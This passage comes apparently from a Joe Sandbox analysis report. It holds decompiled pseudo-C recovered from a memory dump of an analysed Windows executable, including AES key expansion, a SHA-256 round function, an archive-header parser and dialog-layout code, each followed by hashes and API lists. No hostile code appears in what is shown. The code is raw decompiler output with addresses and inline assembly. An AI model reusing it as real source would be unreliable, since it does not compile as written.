                						__eflags = _t84;
                						if(__eflags == 0) {
                							L28:
                							_push(0);
                							_push(0xa);
                							L29:
                							_t51 = E003F5993(_t119, _t114, __eflags);
                							goto L10;
                						}
                						__eflags = _t84 - 3;
                						if(__eflags != 0) {
                							goto L11;
                						}
                						_push(0);
                						L13:
                						_push(0x10);
                						goto L29;
                					}
                					if(__eflags == 0) {
                						_t51 = E003F5B70(__ecx);
                						goto L10;
                					}
                					__eflags = _t49 - 0x67;
                					if(_t49 <= 0x67) {
                						L30:
                						_t51 = E003F559F(_t92, _t119, _t112);
                						goto L10;
                					}
                					__eflags = _t49 - 0x69;
                					if(_t49 == 0x69) {
                						L27:
                						_t2 = _t119 + 0x20;
                						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                						__eflags =  *_t2;
                						goto L28;
                					}
                					__eflags = _t49 - 0x6e;
                					if(_t49 == 0x6e) {
                						_t51 = E003F5ADD(__ecx, _t112);
                						goto L10;
                					}
                					__eflags = _t49 - 0x6f;
                					if(_t49 != 0x6f) {
                						goto L11;
                					}
                					_t51 = E003F5B51(__ecx);
                					goto L10;
                				}
                				if(_t124 == 0) {
                					goto L27;
                				}
                				_t125 = _t49 - 0x58;
                				if(_t125 > 0) {
                					_t86 = _t49 - 0x5a;
                					__eflags = _t86;
                					if(_t86 == 0) {
                						_t51 = E003F54D9(__ecx);
                						goto L10;
                					}
                					_t87 = _t86 - 7;
                					__eflags = _t87;
                					if(_t87 == 0) {
                						goto L30;
                					}
                					__eflags = _t87;
                					if(__eflags != 0) {
                						goto L11;
                					}
                					L17:
                					_t51 = E003F586B(_t92, _t119, __eflags, 0);
                					goto L10;
                				}
                				if(_t125 == 0) {
                					_push(1);
                					goto L13;
                				}
                				if(_t49 == 0x41) {
                					goto L30;
                				}
                				if(_t49 == 0x43) {
                					goto L17;
                				}
                				if(_t49 <= 0x44) {
                					goto L11;
                				}
                				if(_t49 <= 0x47) {
                					goto L30;
                				}
                				if(_t49 != 0x53) {
                					goto L11;
                				}
                				goto L9;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                • Instruction ID: 867df1a452cec65adb00eaf1c28b606a4d5124da2ea994291e746606586a4d65
                • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                • Instruction Fuzzy Hash: 5C516A61200F4E57DF3B4928895AFBF67C99B02300F190919EB87CB683DA19ED45C3D5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E003DEFE2(intOrPtr __ecx, char _a4) {
                				char _v12;
                				signed int _v13;
                				signed int _v14;
                				signed int _v15;
                				signed int _v16;
                				signed char _v17;
                				signed char _v18;
                				signed char _v19;
                				signed char _v20;
                				char _v28;
                				signed int _v29;
                				signed int _v30;
                				signed int _v31;
                				signed int _v32;
                				signed int* _v36;
                				signed int _v40;
                				char _v44;
                				intOrPtr _v48;
                				signed int _t94;
                				signed int _t113;
                				signed int _t116;
                				signed int _t117;
                				signed char _t120;
                				signed int* _t121;
                				signed int* _t122;
                				signed int _t123;
                				signed int* _t124;
                				signed int _t125;
                				signed int _t126;
                				signed int _t127;
                				signed int* _t128;
                				void* _t130;
                				signed int _t131;
                				void* _t132;
                				signed int _t134;
                				signed int* _t139;
                				signed int* _t142;
                				void* _t145;
                				void* _t167;
                
                				_t134 = _a4 - 6;
                				_v48 = __ecx;
                				_v40 = _t134;
                				_t94 = E003F0320( &_v32, _a4, 0x20);
                				_t145 =  &_v48 + 0xc;
                				_t117 = 0;
                				_t126 = 0;
                				_t127 = 0;
                				if(_t134 <= 0) {
                					L10:
                					if(_t117 <= _a4) {
                						_t128 = 0x40e198;
                						do {
                							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0x40e098);
                							_v32 = _t120;
                							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0x40e098);
                							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0x40e098);
                							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0x40e098);
                							_t94 =  *_t128 ^ _t120;
                							_v32 = _t94;
                							_v36 =  &(_t128[0]);
                							if(_t134 == 8) {
                								_t121 =  &_v28;
                								_v44 = 3;
                								do {
                									_t130 = 4;
                									do {
                										 *_t121 =  *_t121 ^  *(_t121 - 4);
                										_t121 =  &(_t121[0]);
                										_t130 = _t130 - 1;
                									} while (_t130 != 0);
                									_t55 =  &_v44;
                									 *_t55 = _v44 - 1;
                								} while ( *_t55 != 0);
                								_t122 =  &_v12;
                								_v44 = 3;
                								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x40e098);
                								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x40e098);
                								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x40e098);
                								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x40e098);
                								do {
                									_t131 = 4;
                									do {
                										_t94 =  *((intOrPtr*)(_t122 - 4));
                										 *_t122 =  *_t122 ^ _t94;
                										_t122 =  &(_t122[0]);
                										_t131 = _t131 - 1;
                									} while (_t131 != 0);
                									_t76 =  &_v44;
                									 *_t76 = _v44 - 1;
                								} while ( *_t76 != 0);
                								goto L28;
                							} else {
                								if(_t134 > 1) {
                									_t124 =  &_v28;
                									_v44 = _t134 - 1;
                									do {
                										_t132 = 4;
                										do {
                											_t94 =  *((intOrPtr*)(_t124 - 4));
                											 *_t124 =  *_t124 ^ _t94;
                											_t124 =  &(_t124[0]);
                											_t132 = _t132 - 1;
                										} while (_t132 != 0);
                										_t50 =  &_v44;
                										 *_t50 = _v44 - 1;
                									} while ( *_t50 != 0);
                								}
                								_t131 = 0;
                								if(_t134 <= 0) {
                									L37:
                									_t167 = _t117 - _a4;
                								} else {
                									L28:
                									while(_t117 <= _a4) {
                										if(_t131 < _t134) {
                											_t139 =  &(( &_v32)[_t131]);
                											while(_t126 < 4) {
                												_t123 = _t126 + _t117 * 4;
                												_t113 =  *_t139;
                												_t131 = _t131 + 1;
                												_t139 =  &_a4;
                												_t126 = _t126 + 1;
                												 *(_v48 + 0x18 + _t123 * 4) = _t113;
                												_t134 = _v40;
                												if(_t131 < _t134) {
                													continue;
                												}
                												break;
                											}
                										}
                										if(_t126 == 4) {
                											_t117 = _t117 + 1;
                										}
                										_t90 = _t126 - 4; // -4
                										_t94 =  ~_t90;
                										asm("sbb eax, eax");
                										_t126 = _t126 & _t94;
                										if(_t131 < _t134) {
                											continue;
                										} else {
                											goto L37;
                										}
                										goto L38;
                									}
                								}
                							}
                							L38:
                							_t128 = _v36;
                						} while (_t167 <= 0);
                					}
                				} else {
                					while(_t117 <= _a4) {
                						if(_t127 < _t134) {
                							_t142 =  &(( &_v32)[_t127]);
                							while(_t126 < 4) {
                								_t125 = _t126 + _t117 * 4;
                								_t116 =  *_t142;
                								_t127 = _t127 + 1;
                								_t142 =  &_a4;
                								_t126 = _t126 + 1;
                								 *(_v48 + 0x18 + _t125 * 4) = _t116;
                								_t134 = _v40;
                								if(_t127 < _t134) {
                									continue;
                								}
                								break;
                							}
                						}
                						if(_t126 == 4) {
                							_t117 = _t117 + 1;
                						}
                						_t18 = _t126 - 4; // -4
                						_t94 =  ~_t18;
                						asm("sbb eax, eax");
                						_t126 = _t126 & _t94;
                						if(_t127 < _t134) {
                							continue;
                						} else {
                							goto L10;
                						}
                						goto L39;
                					}
                				}
                				L39:
                				return _t94;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 072827dcb7ce554ae2a0f80083435d7d9fff70965cf7b92759b5bfee371e7417
                • Instruction ID: cb35d566a8798dc86386640ed1fde1523887dd80b6b6c841cd13728eed76e267
                • Opcode Fuzzy Hash: 072827dcb7ce554ae2a0f80083435d7d9fff70965cf7b92759b5bfee371e7417
                • Instruction Fuzzy Hash: 3351D6325083D58FD712CF35D58046EBFE0AE9A314F4A49AEE5DA5B343C231DA4ACB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003E00B7() {
                				signed int _t81;
                				signed int _t96;
                				signed int _t98;
                				signed int* _t99;
                				unsigned int* _t100;
                				void* _t101;
                				unsigned int _t103;
                				signed int _t108;
                				unsigned int _t122;
                				signed int _t124;
                				signed int _t125;
                				signed int* _t130;
                				signed int _t131;
                				signed int* _t132;
                				signed int _t133;
                				signed int _t140;
                				void* _t146;
                				void* _t147;
                				void* _t148;
                				signed int _t149;
                				void* _t151;
                
                				_t130 =  *(_t151 + 0x148);
                				_t133 = 0;
                				_t99 =  &(_t130[0xa]);
                				do {
                					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E003F68E4( *_t99);
                					_t99 =  &(_t99[1]);
                					_t133 = _t133 + 1;
                				} while (_t133 < 0x10);
                				_t100 = _t151 + 0x80;
                				_t148 = 0x30;
                				do {
                					_t103 =  *(_t100 - 0x34);
                					_t122 =  *_t100;
                					asm("rol esi, 0xe");
                					_t100 =  &(_t100[1]);
                					asm("ror eax, 0x7");
                					asm("rol eax, 0xd");
                					asm("rol ecx, 0xf");
                					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
                					_t148 = _t148 - 1;
                				} while (_t148 != 0);
                				_t81 =  *_t130;
                				_t101 = 0;
                				_t108 = _t130[1];
                				_t124 = _t130[2];
                				_t140 = _t130[5];
                				_t149 = _t130[4];
                				 *(_t151 + 0x20) = _t81;
                				 *(_t151 + 0x2c) = _t81;
                				 *(_t151 + 0x28) = _t130[3];
                				 *(_t151 + 0x10) = _t130[6];
                				_t131 =  *(_t151 + 0x20);
                				 *(_t151 + 0x14) = _t108;
                				 *(_t151 + 0x18) = _t124;
                				 *(_t151 + 0x1c) = _t140;
                				 *(_t151 + 0x24) = _t130[7];
                				do {
                					 *(_t151 + 0x40) =  *(_t151 + 0x10);
                					asm("rol eax, 0x7");
                					 *(_t151 + 0x3c) = _t140;
                					asm("ror esi, 0xb");
                					 *(_t151 + 0x30) = _t108;
                					 *(_t151 + 0x34) = _t124;
                					_t125 =  *(_t151 + 0x1c);
                					asm("ror eax, 0x6");
                					 *(_t151 + 0x1c) = _t149;
                					 *(_t151 + 0x38) = _t149;
                					_t40 = _t101 + 0x403b28; // 0x428a2f98
                					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
                					_t101 = _t101 + 4;
                					_t147 = _t146 +  *(_t151 + 0x24);
                					 *(_t151 + 0x24) =  *(_t151 + 0x10);
                					_t149 =  *(_t151 + 0x28) + _t147;
                					 *(_t151 + 0x10) = _t125;
                					asm("rol eax, 0xa");
                					asm("ror edx, 0xd");
                					 *(_t151 + 0x20) = _t131;
                					asm("ror eax, 0x2");
                					 *(_t151 + 0x28) =  *(_t151 + 0x18);
                					_t96 =  *(_t151 + 0x14);
                					_t108 = _t131;
                					 *(_t151 + 0x18) = _t96;
                					 *(_t151 + 0x14) = _t108;
                					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
                					_t140 =  *(_t151 + 0x1c);
                					_t124 = _t96;
                				} while (_t101 < 0x100);
                				_t98 =  *(_t151 + 0x2c) + _t131;
                				_t132 =  *(_t151 + 0x148);
                				_t132[1] = _t132[1] + _t108;
                				_t132[2] = _t132[2] +  *(_t151 + 0x30);
                				_t132[3] = _t132[3] +  *(_t151 + 0x34);
                				_t132[5] = _t132[5] +  *(_t151 + 0x38);
                				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
                				_t132[4] = _t132[4] + _t149;
                				_t132[7] = _t132[7] +  *(_t151 + 0x40);
                				 *_t132 = _t98;
                				return _t98;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7cb777eb352f97a0f84b3a71ea9c12f21490c402c36b53100eabb483697b582
                • Instruction ID: c9214f7ebc961fd47c58819c3e33af599faf0773836faa4e214367b4f1d1e5e4
                • Opcode Fuzzy Hash: d7cb777eb352f97a0f84b3a71ea9c12f21490c402c36b53100eabb483697b582
                • Instruction Fuzzy Hash: E051EFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E7340D734EA99CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003E3E0B(unsigned int __ecx) {
                				intOrPtr _t39;
                				signed int _t47;
                				intOrPtr _t48;
                				signed int _t55;
                				signed int _t61;
                				signed int _t66;
                				intOrPtr _t78;
                				signed int _t82;
                				unsigned char _t84;
                				signed int* _t86;
                				intOrPtr _t87;
                				unsigned int _t88;
                				unsigned int _t89;
                				signed int _t90;
                				void* _t91;
                
                				_t88 =  *(_t91 + 0x20);
                				_t61 = 0;
                				_t86 =  *(_t91 + 0x28);
                				_t89 = __ecx;
                				 *(_t91 + 0x18) = __ecx;
                				_t86[3] = 0;
                				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E003E4E52(__ecx) != 0) {
                					E003DA881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
                					 *(_t91 + 0x18) = E003DA898(_t88) >> 8;
                					E003DA881(_t88, 8);
                					_t66 =  *(_t91 + 0x14) & 0x000000ff;
                					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
                					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
                					if(_t39 == 4) {
                						goto L12;
                					}
                					_t86[3] = _t39 + 2;
                					_t86[1] = (_t66 & 0x00000007) + 1;
                					 *(_t91 + 0x20) = E003DA898(_t88) >> 8;
                					E003DA881(_t88, 8);
                					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
                						L8:
                						_t84 =  *(_t91 + 0x14);
                						 *_t86 = _t61;
                						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
                							goto L12;
                						}
                						_t47 =  *_t88;
                						_t86[2] = _t47;
                						_t23 = _t47 - 1; // -1
                						_t48 =  *((intOrPtr*)(_t89 + 0x88));
                						_t78 = _t23 + _t61;
                						if(_t48 >= _t78) {
                							_t48 = _t78;
                						}
                						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
                						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
                						_t86[4] = _t84 >> 7;
                						return 1;
                					}
                					_t87 =  *((intOrPtr*)(_t91 + 0x10));
                					_t90 = _t61;
                					do {
                						_t55 = E003DA898(_t88) >> 8 << _t90;
                						_t90 = _t90 + 8;
                						_t61 = _t61 + _t55;
                						_t82 =  *(_t88 + 4) + 8;
                						 *_t88 =  *_t88 + (_t82 >> 3);
                						 *(_t88 + 4) = _t82 & 0x00000007;
                						_t87 = _t87 - 1;
                					} while (_t87 != 0);
                					_t86 =  *(_t91 + 0x28);
                					_t89 =  *(_t91 + 0x18);
                					goto L8;
                				} else {
                					L12:
                					return 0;
                				}
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                • Instruction ID: 7b9a61129c464e320a78b8a6dd9f6f649f8efaea77fd77729ef6214f995a5399
                • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                • Instruction Fuzzy Hash: 24313BB2A147568FCB15DF29C85116EBBE0FB95304F10462DE8C5C7381C734EA0ACB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E003DE2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
                				char _v0;
                				struct HWND__* _v8;
                				short _v2048;
                				char _v2208;
                				char _v2288;
                				signed int _v2292;
                				char _v2300;
                				intOrPtr _v2304;
                				struct tagRECT _v2320;
                				intOrPtr _v2324;
                				intOrPtr _v2336;
                				struct tagRECT _v2352;
                				struct tagRECT _v2368;
                				signed int _v2376;
                				char _v2377;
                				intOrPtr _v2384;
                				intOrPtr _v2393;
                				void* __ebx;
                				void* __esi;
                				signed int _t95;
                				struct HWND__* _t106;
                				signed int _t119;
                				signed int _t134;
                				signed int _t145;
                				void* _t150;
                				void* _t155;
                				char _t156;
                				void* _t157;
                				signed int _t158;
                				intOrPtr _t160;
                				void* _t163;
                				void* _t169;
                				long _t170;
                				signed int _t174;
                				void* _t178;
                				signed int _t179;
                				signed int _t186;
                				struct HWND__* _t187;
                				struct HWND__* _t188;
                				void* _t189;
                				void* _t192;
                				signed int _t193;
                				long _t194;
                				void* _t201;
                				int* _t202;
                				struct HWND__* _t203;
                				void* _t205;
                				void* _t206;
                				void* _t208;
                				void* _t210;
                				void* _t214;
                				signed int _t221;
                
                				_t178 = __edx;
                				_t203 = __ecx;
                				_v2368.bottom = __ecx;
                				E003D4092( &_v2208, 0x50, L"$%s:", _a8);
                				_t208 =  &_v2368 + 0x10;
                				E003E1DA7( &_v2208,  &_v2288, 0x50);
                				_t95 = E003F3E90( &_v2300);
                				_t187 = _v8;
                				_t155 = 0;
                				_v2376 = _t95;
                				_t210 =  *0x40e720 - _t155; // 0x64
                				if(_t210 <= 0) {
                					L8:
                					_t156 = E003DD81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
                					_v2377 = _t156;
                					GetWindowRect(_t187,  &_v2352);
                					GetClientRect(_t187,  &(_v2320.top));
                					_t169 = _v2352.right - _v2352.left + 1;
                					_t179 = _v2320.bottom;
                					_t192 = _v2352.bottom - _v2352.top + 1;
                					_v2368.right = 0x64;
                					_t205 = _t192 - _v2304;
                					_v2368.bottom = _t169 - _t179;
                					if(_v0 == 0) {
                						if(_t156 != 0) {
                							_t158 = 0x64;
                							asm("cdq");
                							_t134 = _v2292 * _v2368.top;
                							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
                							_v2324 = _t160;
                							asm("cdq");
                							_t186 = _t134 % _v2352.top;
                							_v2352.left = _t134 / _v2352.top + _t205;
                							asm("cdq");
                							asm("cdq");
                							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
                							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
                							if(_t163 < 0) {
                								_t163 = 0;
                							}
                							if(_t201 < 0) {
                								_t201 = 0;
                							}
                							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
                							_t221 = _t145;
                							 *0x433150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
                							GetWindowRect(_t187,  &_v2368);
                							_t156 = _v2393;
                						}
                						if(E003DD89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
                							SetWindowTextW(_t187,  &_v2048);
                						}
                					}
                					_t206 = _t205 - GetSystemMetrics(8);
                					_t106 = GetWindow(_t187, 5);
                					_t188 = _t106;
                					_v2368.bottom = _t188;
                					if(_t156 == 0) {
                						L23:
                						return _t106;
                					} else {
                						_t157 = 0;
                						while(_t188 != 0) {
                							__eflags = _t157 - 0x200;
                							if(_t157 >= 0x200) {
                								goto L23;
                							}
                							GetWindowRect(_t188,  &_v2320);
                							_t170 = _v2320.top.left;
                							_t193 = 0x64;
                							asm("cdq");
                							_t194 = _v2320.left;
                							asm("cdq");
                							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
                							asm("cdq");
                							_t174 = 0x64;
                							asm("cdq");
                							asm("cdq");
                							 *0x433150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
                							_t106 = GetWindow(_t188, 2);
                							_t188 = _t106;
                							__eflags = _t188 - _v2384;
                							if(_t188 == _v2384) {
                								goto L23;
                							}
                							_t157 = _t157 + 1;
                							__eflags = _t157;
                						}
                						goto L23;
                					}
                				} else {
                					_t202 = 0x40e274;
                					do {
                						if( *_t202 > 0) {
                							_t9 =  &(_t202[1]); // 0x404788
                							_t150 = E003F6740( &_v2288,  *_t9, _t95);
                							_t208 = _t208 + 0xc;
                							if(_t150 == 0) {
                								_t12 =  &(_t202[1]); // 0x404788
                								if(E003DD9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
                									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
                								}
                							}
                							_t95 = _v2368.top;
                						}
                						_t155 = _t155 + 1;
                						_t202 =  &(_t202[3]);
                						_t214 = _t155 -  *0x40e720; // 0x64
                					} while (_t214 < 0);
                					goto L8;
                				}
                			}

                APIs
                • _swprintf.LIBCMT ref: 003DE30E
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                  • Part of subcall function 003E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00411030,?,003DD928,00000000,?,00000050,00411030), ref: 003E1DC4
                • _strlen.LIBCMT ref: 003DE32F
                • SetDlgItemTextW.USER32(?,0040E274,?), ref: 003DE38F
                • GetWindowRect.USER32(?,?), ref: 003DE3C9
                • GetClientRect.USER32(?,?), ref: 003DE3D5
                • GetWindowLongW.USER32(?,000000F0), ref: 003DE475
                • GetWindowRect.USER32(?,?), ref: 003DE4A2
                • SetWindowTextW.USER32(?,?), ref: 003DE4DB
                • GetSystemMetrics.USER32(00000008), ref: 003DE4E3
                • GetWindow.USER32(?,00000005), ref: 003DE4EE
                • GetWindowRect.USER32(00000000,?), ref: 003DE51B
                • GetWindow.USER32(00000000,00000002), ref: 003DE58D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$d$t@
                • API String ID: 2407758923-3100925823
                • Opcode ID: dbf185b77ba1c22aafaa7ded37b7476c5f645ccb697f40aec699a8e48f5671bb
                • Instruction ID: ec7c0ecf92f1d2202c361757270b43e32f07d2f0ca3b012b874f58550fdd4017
                • Opcode Fuzzy Hash: dbf185b77ba1c22aafaa7ded37b7476c5f645ccb697f40aec699a8e48f5671bb
                • Instruction Fuzzy Hash: 9781B272208301AFD711DF68DD89A6FBBE9FB88704F04092EFA84E7250D734E9058B52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003FCB22(intOrPtr _a4) {
                				intOrPtr _v8;
                				intOrPtr _t25;
                				intOrPtr* _t26;
                				intOrPtr _t28;
                				intOrPtr* _t29;
                				intOrPtr* _t31;
                				intOrPtr* _t45;
                				intOrPtr* _t46;
                				intOrPtr* _t47;
                				intOrPtr* _t55;
                				intOrPtr* _t70;
                				intOrPtr _t74;
                
                				_t74 = _a4;
                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                				if(_t25 != 0 && _t25 != 0x40eea0) {
                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                					if(_t45 != 0 &&  *_t45 == 0) {
                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                						if(_t46 != 0 &&  *_t46 == 0) {
                							E003F8DCC(_t46);
                							E003FC701( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                						if(_t47 != 0 &&  *_t47 == 0) {
                							E003F8DCC(_t47);
                							E003FC7FF( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						E003F8DCC( *((intOrPtr*)(_t74 + 0x7c)));
                						E003F8DCC( *((intOrPtr*)(_t74 + 0x88)));
                					}
                				}
                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                				if(_t26 != 0 &&  *_t26 == 0) {
                					E003F8DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                					E003F8DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                					E003F8DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                					E003F8DCC( *((intOrPtr*)(_t74 + 0x8c)));
                				}
                				E003FCC95( *((intOrPtr*)(_t74 + 0x9c)));
                				_t28 = 6;
                				_t55 = _t74 + 0xa0;
                				_v8 = _t28;
                				_t70 = _t74 + 0x28;
                				do {
                					if( *((intOrPtr*)(_t70 - 8)) != 0x40e968) {
                						_t31 =  *_t70;
                						if(_t31 != 0 &&  *_t31 == 0) {
                							E003F8DCC(_t31);
                							E003F8DCC( *_t55);
                						}
                						_t28 = _v8;
                					}
                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                						_t29 =  *((intOrPtr*)(_t70 - 4));
                						if(_t29 != 0 &&  *_t29 == 0) {
                							E003F8DCC(_t29);
                						}
                						_t28 = _v8;
                					}
                					_t55 = _t55 + 4;
                					_t70 = _t70 + 0x10;
                					_t28 = _t28 - 1;
                					_v8 = _t28;
                				} while (_t28 != 0);
                				return E003F8DCC(_t74);
                			}
















                APIs
                • ___free_lconv_mon.LIBCMT ref: 003FCB66
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC71E
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC730
